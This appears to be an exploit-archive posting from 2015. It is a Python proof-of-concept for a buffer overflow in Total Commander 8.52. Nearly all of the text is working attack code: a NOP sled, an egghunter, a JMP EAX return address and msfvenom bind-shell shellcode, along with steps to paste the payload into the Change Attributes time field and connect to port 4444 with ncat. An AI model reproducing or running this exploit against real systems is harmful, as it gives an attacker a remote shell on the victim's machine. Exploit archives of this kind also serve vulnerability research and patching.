Total Commander 8.52 Buffer Overflow
Posted on 22 September 2015
#!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'w'); buffer = "x90"*190 buffer += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x52x30x63x58x8bxfaxafx75xeaxafx75xe7xffxe7" # Egghunter looking for R0cX R0cX buffer += "x90"*(265- len(buffer)) buffer += "x47x47xf7x75" #75F74747 FFE0 JMP EAX # bad characters - x00x0ax0d # msfvenom -p windows/shell_bind_tcp -f c -b 'x00x0ax0d' buffer += "R0cX" + "R0cX" + ("xbfx46xebxb1xe7xdaxc5xd9x74x24xf4x5dx29xc9xb1" "x53x31x7dx12x83xc5x04x03x3bxe5x53x12x3fx11x11" "xddxbfxe2x76x57x5axd3xb6x03x2fx44x07x47x7dx69" "xecx05x95xfax80x81x9ax4bx2exf4x95x4cx03xc4xb4" "xcex5ex19x16xeex90x6cx57x37xccx9dx05xe0x9ax30" "xb9x85xd7x88x32xd5xf6x88xa7xaexf9xb9x76xa4xa3" "x19x79x69xd8x13x61x6exe5xeax1ax44x91xecxcax94" "x5ax42x33x19xa9x9ax74x9ex52xe9x8cxdcxefxeax4b" "x9ex2bx7ex4fx38xbfxd8xabxb8x6cxbex38xb6xd9xb4" "x66xdbxdcx19x1dxe7x55x9cxf1x61x2dxbbxd5x2axf5" "xa2x4cx97x58xdax8ex78x04x7exc5x95x51xf3x84xf1" "x96x3ex36x02xb1x49x45x30x1exe2xc1x78xd7x2cx16" "x7exc2x89x88x81xedxe9x81x45xb9xb9xb9x6cxc2x51" "x39x90x17xcfx31x37xc8xf2xbcx87xb8xb2x6ex60xd3" "x3cx51x90xdcx96xfax39x21x19x15xe6xacxffx7fx06" "xf9xa8x17xe4xdex60x80x17x35xd9x26x5fx5fxdex49" "x60x75x48xddxebx9ax4cxfcxebxb6xe4x69x7bx4cx65" "xd8x1dx51xacx8axbexc0x2bx4axc8xf8xe3x1dx9dxcf" "xfdxcbx33x69x54xe9xc9xefx9fxa9x15xccx1ex30xdb" "x68x05x22x25x70x01x16xf9x27xdfxc0xbfx91x91xba" "x69x4dx78x2axefxbdxbbx2cxf0xebx4dxd0x41x42x08" "xefx6ex02x9cx88x92xb2x63x43x17xc2x29xc9x3ex4b" "xf4x98x02x16x07x77x40x2fx84x7dx39xd4x94xf4x3c" "x90x12xe5x4cx89xf6x09xe2xaaxd2") file.write(buffer) file.close()
